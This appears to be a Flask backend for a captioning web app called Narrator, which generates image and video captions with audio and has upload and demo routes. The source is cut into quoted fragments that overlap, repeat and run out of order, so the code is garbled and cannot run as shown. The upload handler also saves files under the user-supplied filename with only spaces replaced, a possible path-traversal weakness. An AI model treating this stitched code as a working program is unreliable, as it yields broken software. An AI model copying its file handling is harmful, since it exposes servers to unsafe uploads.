"= gt print('Videos updated!') # Save samples dataframe samplesDF.to_csv(app.config['SAMPLES_DIR'] + 'sample_captions.csv') # Load",
"io import PIL from flask import render_template, request, redirect, url_for, send_from_directory, session from",
"if len(app.config['SAMPLES_TO_UPDATE']) > 0: # Load image and video datasets coco = COCO(app.config[",
"have been # chosen rand_im_ids = cocoCaptionDF[cocoCaptionDF['set'] == app.config[ 'COCO_SET']].sample(n=32)['id'].values.tolist() rand_im_ids = [x",
"videos(): \"\"\"Render video examples page.\"\"\" return render_template('videos.html', vid_dict=VID_SAMPLES_DICT, page='videos', title=app.config['TITLE']) @app.route('/scenes') def scenes():",
"name + '_gt.ogg') narrator.gen_audio_file( caption, app.config['SAMPLES_DIR'] + name + '.ogg') # update samples",
"'image' + str(ix) + '_gt.ogg', 'caption': im_sample['caption'], 'cap_audio': 'image' + str(ix) + '.ogg'",
"title=app.config['TITLE']) @app.route('/uploads/<filename>') def get_upload(filename): \"\"\"Get path to file in upload directory.\"\"\" return send_from_directory(app.config['UPLOAD_DIR'],",
"# Copy image to samples directory shutil.copy(url, app.config['SAMPLES_DIR'] + name + '.mp4') #",
"[x for x in app.config['SAMPLES_TO_UPDATE'] if 'video' in x] # Randomly select ids",
"Save samples dataframe samplesDF.to_csv(app.config['SAMPLES_DIR'] + 'sample_captions.csv') # Load samples IM_SAMPLES_DICT = [[], [],",
"'caption'] = caption samplesDF.loc[name, 'gt'] = gt print('Videos updated!') # Save samples dataframe",
"'image' + str(ix) + '.ogg' }) VID_SAMPLES_DICT[int(i / 4)].append({ 'id': vid_sample['id'], 'url': 'video'",
"from pycocotools.coco import COCO sys.path.append('../src/') from Narrator import Narrator # Construct classes narrator",
"= determine_type(ext, by_scene) if typ == 'image': by_scene = False # Generate caption/audio",
"'.mp4', by_scene=True, as_string=True) # Create dataframe sceneSamplesDF = pd.DataFrame({ 'time': scene_change_timecodes, 'caption': captions",
"msrvttCaptionDF[msrvttCaptionDF['set'] == 'test'].sample(n=32)[ 'vid_id'].values.tolist() rand_vid_ids = [x for x in rand_vid_ids if x",
"pd import skimage.io as io import PIL from flask import render_template, request, redirect,",
"'id'] = vid_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt'] = gt print('Videos updated!')",
"cap_audio=None): \"\"\"Render demo output page.\"\"\" # Duplicate of above -- allows if request.method",
"Backend of Narrator web app. \"\"\" import os import sys import shutil import",
"+ str(ix) + '.ogg' }) print(\"Samples loaded\") # Get filepath for scene example",
"= narrator.gen_caption( scene_example_file + '.mp4', by_scene=True, as_string=True) # Create dataframe sceneSamplesDF = pd.DataFrame({",
"page='images', title=app.config['TITLE']) @app.route('/videos') def videos(): \"\"\"Render video examples page.\"\"\" return render_template('videos.html', vid_dict=VID_SAMPLES_DICT, page='videos',",
"app.config['VID_EXTENSIONS']: if by_scene: return 'scene' return 'video' return 'image' def generate_caption(file, by_scene): \"\"\"Generate",
"# Load and save imge im = PIL.Image.fromarray(io.imread(url)).convert('RGB') im.save(app.config['SAMPLES_DIR'] + name + '.jpg')",
"= vid_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt'] = gt print('Videos updated!') #",
"# Find nearest gt nearest_gt = '' best_score = 0.0 for gt in",
"dataframe else: sceneSamplesDF = pd.read_csv(scene_example_file + '.csv') # Load scene example SCENE_SAMPLES_DICT =",
"+ 'annotations/instances_{}.json'.format(app.config['COCO_SET'])) cocoCaptionDF = pd.read_csv( app.config['COCOAPI_PATH'] + 'annotations/coco_captions.csv') msrvttCaptionDF = pd.read_csv(app.config['MSRVTT_CAPTION_PATH']) # Determine",
"file.filename.split('.') if isinstance(filename, list): filename = '_'.join(filename) # Replace existing . with _",
"narrator.coco_vocab.decode(x, clean=True)) # Find nearest gt nearest_gt = '' best_score = 0.0 for",
"caption) if bleu > best_score: best_score = bleu nearest_gt = gt gt =",
"len(app.config['SAMPLES_TO_UPDATE']) > 0: # Load image and video datasets coco = COCO(app.config[ 'COCOAPI_PATH']",
"encode/decode using vocabulary gts = msrvttCaptionDF[msrvttCaptionDF['vid_id'] == vid_id]['caption'] gts = gts.apply(lambda x: narrator.msrvtt_vocab.encode(",
"= ' '.join(caption).capitalize() # Copy image to samples directory shutil.copy(url, app.config['SAMPLES_DIR'] + name",
"existing . with _ return filename, ext def determine_type(ext, by_scene): \"\"\"Determine if image",
"is uploaded if request.method == 'POST': try: # Grab file, and if by_scene",
"@app.route('/uploads/<filename>') def get_upload(filename): \"\"\"Get path to file in upload directory.\"\"\" return send_from_directory(app.config['UPLOAD_DIR'], filename)",
"typ = determine_type(ext, by_scene) if typ == 'image': by_scene = False # Generate",
"gt nearest_gt = '' best_score = 0.0 for gt in gts: bleu =",
"dataframe samplesDF.to_csv(app.config['SAMPLES_DIR'] + 'sample_captions.csv') # Load samples IM_SAMPLES_DICT = [[], [], [], []]",
"captions by scene captions, scene_change_timecodes = narrator.gen_caption( scene_example_file + '.mp4', by_scene=True, as_string=True) #",
"'time': scene_change_timecodes, 'caption': captions }) # Capitalize sceneSamplesDF['caption'] = sceneSamplesDF[ 'caption'].apply(lambda x: x.capitalize())",
"type file.filename = file.filename.replace(' ', '_') file_path = save_file(file) filename, ext = split_filename(file)",
"app.config['SAMPLES_TO_UPDATE'] if 'video' in x] # Randomly select ids from their respective datasets",
"+ '.ogg') # Update samples dataframe samplesDF.loc[name, 'id'] = im_id samplesDF.loc[name, 'caption'] =",
"'.mp4', 'gt': vid_sample['gt'], 'gt_audio': 'video' + str(ix) + '_gt.ogg', 'caption': vid_sample['caption'], 'cap_audio': 'video'",
"0.0 for gt in gts: bleu = narrator.coco_vocab.evaluate([gt], caption) if bleu > best_score:",
"# Update any existing samples if len(app.config['SAMPLES_TO_UPDATE']) > 0: # Load image and",
"x not in samplesDF['id'].values.tolist()][ :len(im_names)] rand_vid_ids = msrvttCaptionDF[msrvttCaptionDF['set'] == 'test'].sample(n=32)[ 'vid_id'].values.tolist() rand_vid_ids =",
"narrator.gen_caption(url, beam_size=8) # Get all gt captions and encode/decode using vocabulary gts =",
"in enumerate(zip(im_names, rand_im_ids)): # Get image and generated caption url = coco.loadImgs(im_id)[0]['coco_url'] caption",
"[x for x in rand_vid_ids if x not in samplesDF['id'].values.tolist()][ :len(vid_names)] # Generate",
"page if not by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config['BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename",
"url = app.config['MSRVTT_DATA_PATH'] + vid_id + '.mp4' caption = narrator.gen_caption(url, beam_size=8) # Get",
"session from app import app sys.path.append(app.config['COCOAPI_PATH'] + 'PythonAPI') from pycocotools.coco import COCO sys.path.append('../src/')",
"redirect, url_for, send_from_directory, session from app import app sys.path.append(app.config['COCOAPI_PATH'] + 'PythonAPI') from pycocotools.coco",
"VID_SAMPLES_DICT[int(i / 4)].append({ 'id': vid_sample['id'], 'url': 'video' + str(ix) + '.mp4', 'gt': vid_sample['gt'],",
"= False # Generate caption/audio and redirect to demo_output page if not by_scene:",
"+ name + '.mp4') # Generate audio files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR'] + name",
"+ 1)) gts = gts.apply(lambda x: narrator.coco_vocab.decode(x, clean=True)) # Find nearest gt nearest_gt",
"@app.route('/videos') def videos(): \"\"\"Render video examples page.\"\"\" return render_template('videos.html', vid_dict=VID_SAMPLES_DICT, page='videos', title=app.config['TITLE']) @app.route('/scenes')",
"information and store to file for i, (name, im_id) in enumerate(zip(im_names, rand_im_ids)): #",
"directory shutil.copy(url, app.config['SAMPLES_DIR'] + name + '.mp4') # Generate audio files narrator.gen_audio_file( gt,",
"def scenes(): \"\"\"Render scene examples page.\"\"\" return render_template('scenes.html', page='scenes', scenes_dict=SCENE_SAMPLES_DICT, title=app.config['TITLE']) @app.route('/contact') def",
"import os import sys import shutil import pandas as pd import skimage.io as",
"request.method == 'POST': try: # Grab file, and if by_scene is requested from",
"Grab file, and if by_scene is requested from website file = request.files['file'] by_scene",
"url_for, send_from_directory, session from app import app sys.path.append(app.config['COCOAPI_PATH'] + 'PythonAPI') from pycocotools.coco import",
"demo(): \"\"\"Render demo page.\"\"\" # Check if file is uploaded if request.method ==",
"-- allows if request.method == 'POST': try: # Grab file, and if by_scene",
"row in sceneSamplesDF.iterrows(): SCENE_SAMPLES_DICT.append({ 'time': row['time'], 'cap_audio': app.config['SCENE_EXAMPLE_FILE'] + '.' + str(i) +",
"page='demo', title=app.config['TITLE']) @app.route('/uploads/<filename>') def get_upload(filename): \"\"\"Get path to file in upload directory.\"\"\" return",
"caption samplesDF.loc[name, 'gt'] = gt print('Images updated!') for i, (name, vid_id) in enumerate(zip(vid_names,",
"x in rand_im_ids if x not in samplesDF['id'].values.tolist()][ :len(im_names)] rand_vid_ids = msrvttCaptionDF[msrvttCaptionDF['set'] ==",
"vocabulary gts = msrvttCaptionDF[msrvttCaptionDF['vid_id'] == vid_id]['caption'] gts = gts.apply(lambda x: narrator.msrvtt_vocab.encode( x, app.config['MAX_LEN']",
"[], []] VID_SAMPLES_DICT = [[], [], [], []] for i, ix in enumerate(range(16)):",
"if isinstance(filename, list): filename = '_'.join(filename) # Replace existing . with _ return",
"render_template('about.html', page='about', title=app.config['TITLE']) @app.route('/demo', methods=['GET', 'POST']) def demo(): \"\"\"Render demo page.\"\"\" # Check",
"captions, scene_change_timecodes = narrator.gen_caption( scene_example_file + '.mp4', by_scene=True, as_string=True) # Create dataframe sceneSamplesDF",
"updated!') for i, (name, vid_id) in enumerate(zip(vid_names, rand_vid_ids)): # Get video and generated",
"scene_example_file + '.' + str(i) + '.ogg') # Save samples dataframe sceneSamplesDF.to_csv(scene_example_file +",
"= 0.0 for gt in gts: bleu = narrator.msrvtt_vocab.evaluate([gt], caption) if bleu >",
"Get image and generated caption url = coco.loadImgs(im_id)[0]['coco_url'] caption = narrator.gen_caption(url, beam_size=8) #",
"'sample_captions.csv', index_col=0) except: samplesDF = pd.DataFrame( columns=['id', 'caption', 'gt'], index=['name']).head() # Update any",
"\\ filename.rsplit('.', 1)[1] in app.config['ALLOWED_EXTENSIONS'] def save_file(file): \"\"\"Save given file and return path.\"\"\"",
"title=app.config['TITLE']) @app.route('/contact') def contact(): \"\"\"Render contact me page.\"\"\" return render_template('contact.html', page='contact', title=app.config['TITLE']) @app.route('/about')",
"caption = narrator.gen_caption(file_path, beam_size=app.config['BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename + '.ogg' narrator.gen_audio_file( caption,",
"web app. \"\"\" import os import sys import shutil import pandas as pd",
"= '_'.join(filename) # Replace existing . with _ return filename, ext def determine_type(ext,",
"+ '.' + str(i) + '.ogg') scenes_dict.append({ 'time': time_codes[i], 'cap_audio': filename + '.'",
"filename, ext = split_filename(file) typ = determine_type(ext, by_scene) if typ == 'image': by_scene",
"'.csv'): # Generate captions by scene captions, scene_change_timecodes = narrator.gen_caption( scene_example_file + '.mp4',",
"str(i) + '.ogg') # Save samples dataframe sceneSamplesDF.to_csv(scene_example_file + '.csv', index=False) # Load",
"im_sample['caption'], 'cap_audio': 'image' + str(ix) + '.ogg' }) VID_SAMPLES_DICT[int(i / 4)].append({ 'id': vid_sample['id'],",
"nearest_gt = gt gt = ' '.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize() # Copy",
"captions and encode/decode using vocabulary gts = cocoCaptionDF[cocoCaptionDF['id'] == im_id]['caption'] gts = gts.apply(lambda",
"gts.apply(lambda x: narrator.coco_vocab.decode(x, clean=True)) # Find nearest gt nearest_gt = '' best_score =",
"APP #################################### ############################################################################## def allowed_file(filename): \"\"\"Determine if a file has an allowed extension.\"\"\"",
"== 'POST': try: # Grab file, and if by_scene is requested from website",
"caption='scene', cap_audio='scene')) except KeyError as e: print(e) return render_template('demo_output.html', filename=filename, typ=typ, caption=caption, cap_audio=cap_audio,",
"'COCOAPI_PATH'] + 'annotations/instances_{}.json'.format(app.config['COCO_SET'])) cocoCaptionDF = pd.read_csv( app.config['COCOAPI_PATH'] + 'annotations/coco_captions.csv') msrvttCaptionDF = pd.read_csv(app.config['MSRVTT_CAPTION_PATH']) #",
"if file is uploaded if request.method == 'POST': try: # Grab file, and",
"caption, app.config['SAMPLES_DIR'] + name + '.ogg') # update samples dataframe samplesDF.loc[name, 'id'] =",
"or video.\"\"\" if ext in app.config['VID_EXTENSIONS']: if by_scene: return 'scene' return 'video' return",
"'scene' return 'video' return 'image' def generate_caption(file, by_scene): \"\"\"Generate caption for given file\"\"\"",
"a file has an allowed extension.\"\"\" return '.' in filename and \\ filename.rsplit('.',",
"'gt'] = gt print('Videos updated!') # Save samples dataframe samplesDF.to_csv(app.config['SAMPLES_DIR'] + 'sample_captions.csv') #",
"COCO sys.path.append('../src/') from Narrator import Narrator # Construct classes narrator = Narrator( root_path=app.config['ROOT_PATH'],",
"in x] # Randomly select ids from their respective datasets and reject any",
"scenes_dict.append({ 'time': time_codes[i], 'cap_audio': filename + '.' + str(i) + '.ogg', 'caption': caption.capitalize()",
"save_file(file): \"\"\"Save given file and return path.\"\"\" file_path = os.path.join(app.config['UPLOAD_DIR'], file.filename) file.save(os.path.join(app.config['UPLOAD_DIR'], file.filename))",
"samplesDF = pd.DataFrame( columns=['id', 'caption', 'gt'], index=['name']).head() # Update any existing samples if",
"audio files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR'] + name + '_gt.ogg') narrator.gen_audio_file( caption, app.config['SAMPLES_DIR'] +",
"file try: samplesDF = pd.read_csv( app.config['SAMPLES_DIR'] + 'sample_captions.csv', index_col=0) except: samplesDF = pd.DataFrame(",
"'.' + str(i) + '.ogg') scenes_dict.append({ 'time': time_codes[i], 'cap_audio': filename + '.' +",
"'_gt.ogg', 'caption': im_sample['caption'], 'cap_audio': 'image' + str(ix) + '.ogg' }) VID_SAMPLES_DICT[int(i / 4)].append({",
"scene captions, scene_change_timecodes = narrator.gen_caption( scene_example_file + '.mp4', by_scene=True, as_string=True) # Create dataframe",
"= PIL.Image.fromarray(io.imread(url)).convert('RGB') im.save(app.config['SAMPLES_DIR'] + name + '.jpg') # Generate audio files narrator.gen_audio_file( gt,",
"str(ix)] IM_SAMPLES_DICT[int(i / 4)].append({ 'id': im_sample['id'], 'url': 'image' + str(ix) + '.jpg', 'gt':",
"filename + '.ogg' narrator.gen_audio_file( caption, app.config['UPLOAD_DIR'] + cap_audio) return redirect(url_for('uploaded_file', filename=file.filename, cap_audio=cap_audio, caption=caption,",
"in upload directory.\"\"\" return send_from_directory(app.config['UPLOAD_DIR'], filename) @app.route('/samples/<filename>') def get_sample(filename): \"\"\"Get path to file",
"name + '.ogg') # update samples dataframe samplesDF.loc[name, 'id'] = vid_id samplesDF.loc[name, 'caption']",
"caption samplesDF.loc[name, 'gt'] = gt print('Videos updated!') # Save samples dataframe samplesDF.to_csv(app.config['SAMPLES_DIR'] +",
"Generate audio files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR'] + name + '_gt.ogg') narrator.gen_audio_file( caption, app.config['SAMPLES_DIR']",
"title=app.config['TITLE']) @app.route('/about') def about(): \"\"\"Render about page.\"\"\" return render_template('about.html', page='about', title=app.config['TITLE']) @app.route('/demo', methods=['GET',",
"samplesDF['id'].values.tolist()][ :len(vid_names)] # Generate sample information and store to file for i, (name,",
"send_from_directory(app.config['UPLOAD_DIR'], filename) @app.route('/samples/<filename>') def get_sample(filename): \"\"\"Get path to file in samples directory.\"\"\" return",
"using vocabulary gts = cocoCaptionDF[cocoCaptionDF['id'] == im_id]['caption'] gts = gts.apply(lambda x: narrator.coco_vocab.encode( x,",
"scene example SCENE_SAMPLES_DICT = [] for i, row in sceneSamplesDF.iterrows(): SCENE_SAMPLES_DICT.append({ 'time': row['time'],",
"is requested from website file = request.files['file'] by_scene = 'by_scene' in request.form #",
"pycocotools.coco import COCO sys.path.append('../src/') from Narrator import Narrator # Construct classes narrator =",
"path to file in upload directory.\"\"\" return send_from_directory(app.config['UPLOAD_DIR'], filename) @app.route('/samples/<filename>') def get_sample(filename): \"\"\"Get",
"1)) gts = gts.apply(lambda x: narrator.msrvtt_vocab.decode(x, clean=True)) # Find the nearest gt nearest_gt",
"'cap_audio': app.config['SCENE_EXAMPLE_FILE'] + '.' + str(i) + '.ogg', 'caption': row['caption'].capitalize() }) ############################################################################## #####################################",
"caption=\"\", cap_audio=None): \"\"\"Render demo output page.\"\"\" # Duplicate of above -- allows if",
"4)].append({ 'id': im_sample['id'], 'url': 'image' + str(ix) + '.jpg', 'gt': im_sample['gt'], 'gt_audio': 'image'",
"+ vid_id + '.mp4' caption = narrator.gen_caption(url, beam_size=8) # Get all gt captions",
"x] # Randomly select ids from their respective datasets and reject any that",
"caption = ' '.join(caption).capitalize() # Load and save imge im = PIL.Image.fromarray(io.imread(url)).convert('RGB') im.save(app.config['SAMPLES_DIR']",
"in enumerate(captions): narrator.gen_audio_file( caption, scene_example_file + '.' + str(i) + '.ogg') # Save",
"contact(): \"\"\"Render contact me page.\"\"\" return render_template('contact.html', page='contact', title=app.config['TITLE']) @app.route('/about') def about(): \"\"\"Render",
"# Construct classes narrator = Narrator( root_path=app.config['ROOT_PATH'], coco_vocab_path=app.config['COCO_VOCAB_PATH'], msrvtt_vocab_path=app.config['MSRVTT_VOCAB_PATH'], base_model=app.config['ENCODER_MODEL'], ic_model_path=app.config['IC_MODEL_PATH'], vc_model_path=app.config['VC_MODEL_PATH'], ic_rnn_type=app.config['IC_RNN_TYPE'],",
"0: # Load image and video datasets coco = COCO(app.config[ 'COCOAPI_PATH'] + 'annotations/instances_{}.json'.format(app.config['COCO_SET']))",
"SCENE_SAMPLES_DICT.append({ 'time': row['time'], 'cap_audio': app.config['SCENE_EXAMPLE_FILE'] + '.' + str(i) + '.ogg', 'caption': row['caption'].capitalize()",
"file_path = save_file(file) filename, ext = split_filename(file) typ = determine_type(ext, by_scene) if typ",
"pd.read_csv( app.config['SAMPLES_DIR'] + 'sample_captions.csv', index_col=0) except: samplesDF = pd.DataFrame( columns=['id', 'caption', 'gt'], index=['name']).head()",
"samplesDF = pd.read_csv( app.config['SAMPLES_DIR'] + 'sample_captions.csv', index_col=0) except: samplesDF = pd.DataFrame( columns=['id', 'caption',",
"allowed if file and allowed_file(file.filename): # Fix filename, save to file, get ext",
"file.filename.replace(' ', '_') file_path = save_file(file) filename, ext = split_filename(file) typ = determine_type(ext,",
"in app.config['ALLOWED_EXTENSIONS'] def save_file(file): \"\"\"Save given file and return path.\"\"\" file_path = os.path.join(app.config['UPLOAD_DIR'],",
"\"\"\"Render video examples page.\"\"\" return render_template('videos.html', vid_dict=VID_SAMPLES_DICT, page='videos', title=app.config['TITLE']) @app.route('/scenes') def scenes(): \"\"\"Render",
"page='about', title=app.config['TITLE']) @app.route('/demo', methods=['GET', 'POST']) def demo(): \"\"\"Render demo page.\"\"\" # Check if",
"already exist if not os.path.exists(scene_example_file + '.csv'): # Generate captions by scene captions,",
"app.config['SAMPLES_DIR'] + name + '.ogg') # Update samples dataframe samplesDF.loc[name, 'id'] = im_id",
"+ name + '.jpg') # Generate audio files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR'] + name",
"if image or video.\"\"\" if ext in app.config['VID_EXTENSIONS']: if by_scene: return 'scene' return",
"# Get all gt captions and encode/decode using vocabulary gts = cocoCaptionDF[cocoCaptionDF['id'] ==",
"best_score = 0.0 for gt in gts: bleu = narrator.coco_vocab.evaluate([gt], caption) if bleu",
"pd.read_csv( app.config['COCOAPI_PATH'] + 'annotations/coco_captions.csv') msrvttCaptionDF = pd.read_csv(app.config['MSRVTT_CAPTION_PATH']) # Determine images and videos to",
"and encode/decode using vocabulary gts = msrvttCaptionDF[msrvttCaptionDF['vid_id'] == vid_id]['caption'] gts = gts.apply(lambda x:",
"image examples page.\"\"\" return render_template('images.html', im_dict=IM_SAMPLES_DICT, page='images', title=app.config['TITLE']) @app.route('/videos') def videos(): \"\"\"Render video",
"'caption'].apply(lambda x: x.capitalize()) # Generate audio files for each caption for i, caption",
"page.\"\"\" return render_template('about.html', page='about', title=app.config['TITLE']) @app.route('/demo', methods=['GET', 'POST']) def demo(): \"\"\"Render demo page.\"\"\"",
"typ='image', caption=\"\", cap_audio=None): \"\"\"Render demo output page.\"\"\" # Duplicate of above -- allows",
"app.config['SAMPLES_DIR'] + name + '.ogg') # update samples dataframe samplesDF.loc[name, 'id'] = vid_id",
"it doesn't already exist if not os.path.exists(scene_example_file + '.csv'): # Generate captions by",
"}) # Capitalize sceneSamplesDF['caption'] = sceneSamplesDF[ 'caption'].apply(lambda x: x.capitalize()) # Generate audio files",
"videos to update im_names = [x for x in app.config['SAMPLES_TO_UPDATE'] if 'image' in",
"\"\"\"Determine if a file has an allowed extension.\"\"\" return '.' in filename and",
"if x not in samplesDF['id'].values.tolist()][ :len(im_names)] rand_vid_ids = msrvttCaptionDF[msrvttCaptionDF['set'] == 'test'].sample(n=32)[ 'vid_id'].values.tolist() rand_vid_ids",
"nearest gt nearest_gt = '' best_score = 0.0 for gt in gts: bleu",
"= ' '.join(caption).capitalize() # Load and save imge im = PIL.Image.fromarray(io.imread(url)).convert('RGB') im.save(app.config['SAMPLES_DIR'] +",
"in enumerate(range(16)): im_sample = samplesDF.loc['image' + str(ix)] vid_sample = samplesDF.loc['video' + str(ix)] IM_SAMPLES_DICT[int(i",
"= sceneSamplesDF[ 'caption'].apply(lambda x: x.capitalize()) # Generate audio files for each caption for",
"if by_scene is requested from website file = request.files['file'] by_scene = 'by_scene' in",
"by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config['BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename + '.ogg' narrator.gen_audio_file(",
"= narrator.gen_caption(file_path, beam_size=app.config['BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename + '.ogg' narrator.gen_audio_file( caption, app.config['UPLOAD_DIR']",
"title=app.config['TITLE']) @app.route('/scenes') def scenes(): \"\"\"Render scene examples page.\"\"\" return render_template('scenes.html', page='scenes', scenes_dict=SCENE_SAMPLES_DICT, title=app.config['TITLE'])",
"# Generate caption/audio by scene and redirect to demo_output # page captions, time_codes",
"@app.route('/samples/<filename>') def get_sample(filename): \"\"\"Get path to file in samples directory.\"\"\" return send_from_directory(app.config['SAMPLES_DIR'], filename)",
"= COCO(app.config[ 'COCOAPI_PATH'] + 'annotations/instances_{}.json'.format(app.config['COCO_SET'])) cocoCaptionDF = pd.read_csv( app.config['COCOAPI_PATH'] + 'annotations/coco_captions.csv') msrvttCaptionDF =",
"gt in gts: bleu = narrator.msrvtt_vocab.evaluate([gt], caption) if bleu > best_score: best_score =",
"isinstance(filename, list): filename = '_'.join(filename) # Replace existing . with _ return filename,",
"app.config[ 'SAMPLES_DIR'] + app.config['SCENE_EXAMPLE_FILE'] # Create scene example if it doesn't already exist",
"respective datasets and reject any that already have been # chosen rand_im_ids =",
"+ filename + '.' + str(i) + '.ogg') scenes_dict.append({ 'time': time_codes[i], 'cap_audio': filename",
"by_scene=by_scene).capitalize() cap_audio = filename + '.ogg' narrator.gen_audio_file( caption, app.config['UPLOAD_DIR'] + cap_audio) return redirect(url_for('uploaded_file',",
"+ app.config['SCENE_EXAMPLE_FILE'] # Create scene example if it doesn't already exist if not",
"i, caption in enumerate(captions): narrator.gen_audio_file( caption, scene_example_file + '.' + str(i) + '.ogg')",
"sys.path.append(app.config['COCOAPI_PATH'] + 'PythonAPI') from pycocotools.coco import COCO sys.path.append('../src/') from Narrator import Narrator #",
"path.\"\"\" file_path = os.path.join(app.config['UPLOAD_DIR'], file.filename) file.save(os.path.join(app.config['UPLOAD_DIR'], file.filename)) return file_path def split_filename(file): \"\"\"Split filename",
"index=False) # Load samples dataframe else: sceneSamplesDF = pd.read_csv(scene_example_file + '.csv') # Load",
"Narrator import Narrator # Construct classes narrator = Narrator( root_path=app.config['ROOT_PATH'], coco_vocab_path=app.config['COCO_VOCAB_PATH'], msrvtt_vocab_path=app.config['MSRVTT_VOCAB_PATH'], base_model=app.config['ENCODER_MODEL'],",
"demo_output page if not by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio",
"cap_audio=cap_audio, page='demo', title=app.config['TITLE']) @app.route('/uploads/<filename>') def get_upload(filename): \"\"\"Get path to file in upload directory.\"\"\"",
"#################################### ############################################################################## def allowed_file(filename): \"\"\"Determine if a file has an allowed extension.\"\"\" return",
"page captions, time_codes = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene) scenes_dict = [] for",
"and save imge im = PIL.Image.fromarray(io.imread(url)).convert('RGB') im.save(app.config['SAMPLES_DIR'] + name + '.jpg') # Generate",
"title=app.config['TITLE']) @app.route('/demo', methods=['GET', 'POST']) def demo(): \"\"\"Render demo page.\"\"\" # Check if file",
"for each caption for i, caption in enumerate(captions): narrator.gen_audio_file( caption, scene_example_file + '.'",
"an allowed extension.\"\"\" return '.' in filename and \\ filename.rsplit('.', 1)[1] in app.config['ALLOWED_EXTENSIONS']",
"row['caption'].capitalize() }) ############################################################################## ##################################### APP #################################### ############################################################################## def allowed_file(filename): \"\"\"Determine if a file",
"render_template('main.html', page='main', title=app.config['TITLE']) @app.route('/images') def images(): \"\"\"Render image examples page.\"\"\" return render_template('images.html', im_dict=IM_SAMPLES_DICT,",
"try: # Grab file, and if by_scene is requested from website file =",
"send_from_directory, session from app import app sys.path.append(app.config['COCOAPI_PATH'] + 'PythonAPI') from pycocotools.coco import COCO",
"Get all gt captions and encode/decode using vocabulary gts = msrvttCaptionDF[msrvttCaptionDF['vid_id'] == vid_id]['caption']",
"and determine type file.filename = file.filename.replace(' ', '_') file_path = save_file(file) filename, ext",
"in request.form # Check if filetype is allowed if file and allowed_file(file.filename): #",
"'video' + str(ix) + '.ogg' }) print(\"Samples loaded\") # Get filepath for scene",
"'.csv', index=False) # Load samples dataframe else: sceneSamplesDF = pd.read_csv(scene_example_file + '.csv') #",
"i, (name, im_id) in enumerate(zip(im_names, rand_im_ids)): # Get image and generated caption url",
"page.\"\"\" return render_template('contact.html', page='contact', title=app.config['TITLE']) @app.route('/about') def about(): \"\"\"Render about page.\"\"\" return render_template('about.html',",
"Generate sample information and store to file for i, (name, im_id) in enumerate(zip(im_names,",
"by_scene) if typ == 'image': by_scene = False # Generate caption/audio and redirect",
"samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt'] = gt print('Videos updated!') # Save samples",
"os import sys import shutil import pandas as pd import skimage.io as io",
"redirect(url_for('uploaded_file', filename=file.filename, typ='scene', caption='scene', cap_audio='scene')) except KeyError as e: print(e) return render_template('demo.html', page='demo',",
"output page.\"\"\" # Duplicate of above -- allows if request.method == 'POST': try:",
"beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene) scenes_dict = [] for i, caption in enumerate(captions): narrator.gen_audio_file(caption,",
"'_gt.ogg') narrator.gen_audio_file( caption, app.config['SAMPLES_DIR'] + name + '.ogg') # Update samples dataframe samplesDF.loc[name,",
"= [[], [], [], []] for i, ix in enumerate(range(16)): im_sample = samplesDF.loc['image'",
"+ '.mp4', 'gt': vid_sample['gt'], 'gt_audio': 'video' + str(ix) + '_gt.ogg', 'caption': vid_sample['caption'], 'cap_audio':",
"render_template('contact.html', page='contact', title=app.config['TITLE']) @app.route('/about') def about(): \"\"\"Render about page.\"\"\" return render_template('about.html', page='about', title=app.config['TITLE'])",
"determine_type(ext, by_scene): \"\"\"Determine if image or video.\"\"\" if ext in app.config['VID_EXTENSIONS']: if by_scene:",
"return render_template('demo.html', page='demo', title=app.config['TITLE']) @app.route('/demo/<filename>&<cap_audio>&<typ>&<caption>', methods=['GET', 'POST']) def uploaded_file(filename, typ='image', caption=\"\", cap_audio=None): \"\"\"Render",
"= caption samplesDF.loc[name, 'gt'] = gt print('Images updated!') for i, (name, vid_id) in",
"vid_sample['gt'], 'gt_audio': 'video' + str(ix) + '_gt.ogg', 'caption': vid_sample['caption'], 'cap_audio': 'video' + str(ix)",
"+ 'annotations/coco_captions.csv') msrvttCaptionDF = pd.read_csv(app.config['MSRVTT_CAPTION_PATH']) # Determine images and videos to update im_names",
"in samplesDF['id'].values.tolist()][ :len(vid_names)] # Generate sample information and store to file for i,",
"samples directory shutil.copy(url, app.config['SAMPLES_DIR'] + name + '.mp4') # Generate audio files narrator.gen_audio_file(",
"in sceneSamplesDF.iterrows(): SCENE_SAMPLES_DICT.append({ 'time': row['time'], 'cap_audio': app.config['SCENE_EXAMPLE_FILE'] + '.' + str(i) + '.ogg',",
"except: samplesDF = pd.DataFrame( columns=['id', 'caption', 'gt'], index=['name']).head() # Update any existing samples",
"'url': 'video' + str(ix) + '.mp4', 'gt': vid_sample['gt'], 'gt_audio': 'video' + str(ix) +",
"caption for given file\"\"\" file.filename = file.filename.replace(' ', '_') @app.route('/') @app.route('/index') def index():",
"msrvttCaptionDF[msrvttCaptionDF['vid_id'] == vid_id]['caption'] gts = gts.apply(lambda x: narrator.msrvtt_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts",
"'.mp4') # Generate audio files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR'] + name + '_gt.ogg') narrator.gen_audio_file(",
"############################################################################## ##################################### APP #################################### ############################################################################## def allowed_file(filename): \"\"\"Determine if a file has an",
"str(ix) + '.ogg' }) print(\"Samples loaded\") # Get filepath for scene example scene_example_file",
"# Load image and video datasets coco = COCO(app.config[ 'COCOAPI_PATH'] + 'annotations/instances_{}.json'.format(app.config['COCO_SET'])) cocoCaptionDF",
"\"\"\"Render demo page.\"\"\" # Check if file is uploaded if request.method == 'POST':",
